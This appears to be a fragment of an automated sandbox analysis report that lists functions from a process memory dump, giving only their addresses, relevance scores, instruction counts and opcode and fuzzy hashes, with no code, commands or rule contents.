                                                                                                                                                                  • Source File: 0000009F.00000002.2839369327.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: ed137aede2f8d01b75a8f5845addc940462888ba9e8b7eb45bd6a5c3a6f1c990
                                                                                                                                                                  • Instruction ID: 247d16a4e9648c713676a3f6e0b063f50c4635f4a61bec29f951ba1d84cf2c80
                                                                                                                                                                  • Opcode Fuzzy Hash: ed137aede2f8d01b75a8f5845addc940462888ba9e8b7eb45bd6a5c3a6f1c990
                                                                                                                                                                  • Instruction Fuzzy Hash: FDE1B230A09A4E8FEBA8DF28C8557E977D1EF94310F04436AE84DC72A5DE74A9458B81
                                                                                                                                                                  Function 00007FFD9BAD0488 Relevance: 1.6, Strings: 1, Instructions: 321COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000009F.00000002.2839369327.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: [7L_^
                                                                                                                                                                  • API String ID: 0-2784272456
                                                                                                                                                                  • Opcode ID: a27d9422e50a7a611baf588809dca036ffcaded002eea0aa8e1ff0d3766b6633
                                                                                                                                                                  • Instruction ID: 82c91640d78c73fda6464af35ed47617c98f2622ef6ccb77ec59e44b2ddd134b
                                                                                                                                                                  • Opcode Fuzzy Hash: a27d9422e50a7a611baf588809dca036ffcaded002eea0aa8e1ff0d3766b6633
                                                                                                                                                                  • Instruction Fuzzy Hash: A6A1D571B0991D4FEBA4FB6884A97B973E2EFD8314F550279E41DC32E6CE78A8418740
                                                                                                                                                                  Function 00007FFD9BAD1468 Relevance: 1.3, Strings: 1, Instructions: 53COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000009F.00000002.2839369327.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: [7L_^
                                                                                                                                                                  • API String ID: 0-2784272456
                                                                                                                                                                  • Opcode ID: 15bf5e49269b32da3d03bab4468dfde6ee1610ea9948bafa5682e4474df02fbf
                                                                                                                                                                  • Instruction ID: 929410c49b7cd145266d094a710d24bac186e2a01e9b6894aa8138665b477d7f
                                                                                                                                                                  • Opcode Fuzzy Hash: 15bf5e49269b32da3d03bab4468dfde6ee1610ea9948bafa5682e4474df02fbf
                                                                                                                                                                  • Instruction Fuzzy Hash: 0401C831B1D9198FE769B368D422BFA73E1EF85324F00427AE05EC65D7CE6974428781
                                                                                                                                                                  Function 00007FFD9BAD1065 Relevance: .4, Instructions: 427COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000009F.00000002.2839369327.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: fffb98fa8e6f5987cf3496ea488dce701173501bba18f11bcdc6732ad09ec8ad
                                                                                                                                                                  • Instruction ID: 5b90737a64aa3f5a0e684ca9d917f04c2b5385cd2dbcb5c5e12a254dd7b1a00e
                                                                                                                                                                  • Opcode Fuzzy Hash: fffb98fa8e6f5987cf3496ea488dce701173501bba18f11bcdc6732ad09ec8ad
                                                                                                                                                                  • Instruction Fuzzy Hash: 26A1F431B0994D4FEBA4EB2884A967977E2EFD8314F5502B9D45DC32E6CE78AC41C740
                                                                                                                                                                  Function 00007FFD9BAD5386 Relevance: .3, Instructions: 327COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000009F.00000002.2839369327.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 823acae59d60140a6e71b080786d8a4ce936bb235bf0292ae54b23e0039631ed
                                                                                                                                                                  • Instruction ID: c6cf34896693dbfba1fd35e0865fa065a9a4b77aeaf8a9935dffda6079fa9c82
                                                                                                                                                                  • Opcode Fuzzy Hash: 823acae59d60140a6e71b080786d8a4ce936bb235bf0292ae54b23e0039631ed
                                                                                                                                                                  • Instruction Fuzzy Hash: 24B1D530A09A4D8FDB69DF28C8557E93BE1FF55310F04426EE84DC7292CE749945CB82
                                                                                                                                                                  Function 00007FFD9BAD22BC Relevance: .2, Instructions: 195COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000009F.00000002.2839369327.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 9ccf022008c62151722656a22dd5eb5b0196249133a26cddf5e04d8061e45c06
                                                                                                                                                                  • Instruction ID: 9d38163d8f231a8a54907375c8ee2773f17e0295c22a837fe0235b939059f707
                                                                                                                                                                  • Opcode Fuzzy Hash: 9ccf022008c62151722656a22dd5eb5b0196249133a26cddf5e04d8061e45c06
                                                                                                                                                                  • Instruction Fuzzy Hash: 98517031D08A1C8FDB68DF58D855BE9BBB1FF59310F1082AAD44DD3292DE34A9858F81
                                                                                                                                                                  Function 00007FFD9BAD09B0 Relevance: .2, Instructions: 176COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000009F.00000002.2839369327.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: cdc40127544c517b2867a432a5773b7d88fd9ba75036c5a359b70a9f796ff949
                                                                                                                                                                  • Instruction ID: 533c59b2aa2d6da259c6449d557344447fe6c739c0c4e0bdecba1f10c3684d0a
                                                                                                                                                                  • Opcode Fuzzy Hash: cdc40127544c517b2867a432a5773b7d88fd9ba75036c5a359b70a9f796ff949
                                                                                                                                                                  • Instruction Fuzzy Hash: 7D51A531B2CA494FEB58AF2C84696B977D1EF99704F040279E44EC32D6DE64A8428745
                                                                                                                                                                  Function 00007FFD9BAD0991 Relevance: .2, Instructions: 170COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000009F.00000002.2839369327.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: bc243df33c19eb9451d561fcac89398d0723b202536d56a203ff52fb482686d3
                                                                                                                                                                  • Instruction ID: 938c45ef649586adcc1724c668e0d4dbfa9cd26f9d304c38c4e6604e5e4bcde0
                                                                                                                                                                  • Opcode Fuzzy Hash: bc243df33c19eb9451d561fcac89398d0723b202536d56a203ff52fb482686d3
                                                                                                                                                                  • Instruction Fuzzy Hash: 4341E530B1CA494FEB58AB6C88696B877D1EF99704F050279E44DC32E6CEA8AC428745
                                                                                                                                                                  Function 00007FFD9BAD0848 Relevance: .1, Instructions: 140COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000009F.00000002.2839369327.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 0ef960bcc7fcaaca7851ded89b235ee6e17506dada68665ab4e279051f9e14a6
                                                                                                                                                                  • Instruction ID: 31dc62b32b6932ddf236d67a4f14277382fe0996cdeffdd53c76da56d04278da
                                                                                                                                                                  • Opcode Fuzzy Hash: 0ef960bcc7fcaaca7851ded89b235ee6e17506dada68665ab4e279051f9e14a6
                                                                                                                                                                  • Instruction Fuzzy Hash: 82316170E1895D9FDF94EFA8C8A5AAD77F1FF98310F4005B5E009D7296DA78A841CB40
                                                                                                                                                                  Function 00007FFD9BAD0C72 Relevance: .1, Instructions: 65COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000009F.00000002.2839369327.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 8452f2d38e39256084c9d9692b8969f733b51b467b36410cd74bd7b3b57be4c1
                                                                                                                                                                  • Instruction ID: 1d65dc05bf4796fe5e6c90ac4b110edf48dd8f9f6f624ed7fcbdef278cfa70e3
                                                                                                                                                                  • Opcode Fuzzy Hash: 8452f2d38e39256084c9d9692b8969f733b51b467b36410cd74bd7b3b57be4c1
                                                                                                                                                                  • Instruction Fuzzy Hash: A011363090E2C64FE32793B048716957F60AF43354F4A03EAD0D8C71E3DA9C6445C362
                                                                                                                                                                  Function 00007FFD9BAD0BDB Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000009F.00000002.2839369327.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: d163a288a4c54956d59ad1beac98e753a7ca08f18cf3497501cdd955d2b24bf2
                                                                                                                                                                  • Instruction ID: 4484124334572a773302c91b88532f1f511728976fce475b39625f48f4706006
                                                                                                                                                                  • Opcode Fuzzy Hash: d163a288a4c54956d59ad1beac98e753a7ca08f18cf3497501cdd955d2b24bf2
                                                                                                                                                                  • Instruction Fuzzy Hash: 08F0E5B254D64C2FEB589959EC179F63B98EBC3234F00101FF58E82063F1527913C255